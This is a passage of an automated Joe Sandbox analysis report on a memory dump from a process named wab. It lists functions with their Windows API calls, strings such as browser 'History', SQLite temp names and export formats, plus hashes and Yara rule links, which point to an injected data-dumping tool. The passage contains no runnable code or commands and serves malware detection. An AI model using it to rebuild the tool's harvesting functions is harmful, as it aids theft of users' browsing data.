                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                    • memset.MSVCRT ref: 0040C439
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    • memset.MSVCRT ref: 0040C4D0
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                    • String ID:
                    • API String ID: 1973883786-0
                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004116FF
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2618321458-3614832568
                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004185FC
                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@AttributesFilememset
                    • String ID:
                    • API String ID: 776155459-0
                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                    • malloc.MSVCRT ref: 00417524
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                    • String ID:
                    • API String ID: 2308052813-0
                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PathTemp$??3@
                    • String ID: %s\etilqs_$etilqs_
                    • API String ID: 1589464350-1420421710
                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040FDD5
                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 0040FE1F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                    • String ID: <%s>%s</%s>$</item>$<item>
                    • API String ID: 1775345501-2769808009
                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                    Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                    Download Yara Rule
                    APIs
                    • wcscpy.MSVCRT ref: 0041477F
                    • wcscpy.MSVCRT ref: 0041479A
                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$CloseCreateFileHandle
                    • String ID: General
                    • API String ID: 999786162-26480598
                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastMessage_snwprintf
                    • String ID: Error$Error %d: %s
                    • API String ID: 313946961-1552265934
                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: foreign key constraint failed$new$oid$old
                    • API String ID: 0-1953309616
                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                    • API String ID: 3510742995-272990098
                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 00417497
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                    • malloc.MSVCRT ref: 004174BD
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                    • String ID:
                    • API String ID: 2903831945-0
                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 0040D453
                    • GetWindowRect.USER32(?,?), ref: 0040D460
                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • memset.MSVCRT ref: 004450CD
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                    • String ID:
                    • API String ID: 1471605966-0
                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    • wcscpy.MSVCRT ref: 0044475F
                    • wcscat.MSVCRT ref: 0044476E
                    • wcscat.MSVCRT ref: 0044477F
                    • wcscat.MSVCRT ref: 0044478E
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                    • String ID: \StringFileInfo\
                    • API String ID: 102104167-2245444037
                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                    Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$??3@
                    • String ID: g4@
                    • API String ID: 3314356048-2133833424
                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _memicmpwcslen
                    • String ID: @@@@$History
                    • API String ID: 1872909662-685208920
                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004100FB
                    • memset.MSVCRT ref: 00410112
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 00410141
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf_wcslwrwcscpy
                    • String ID: </%s>
                    • API String ID: 3400436232-259020660
                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040D58D
                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ChildEnumTextWindowWindowsmemset
                    • String ID: caption
                    • API String ID: 1523050162-4135340389
                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                    • String ID: MS Sans Serif
                    • API String ID: 210187428-168460110
                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClassName_wcsicmpmemset
                    • String ID: edit
                    • API String ID: 2747424523-2167791130
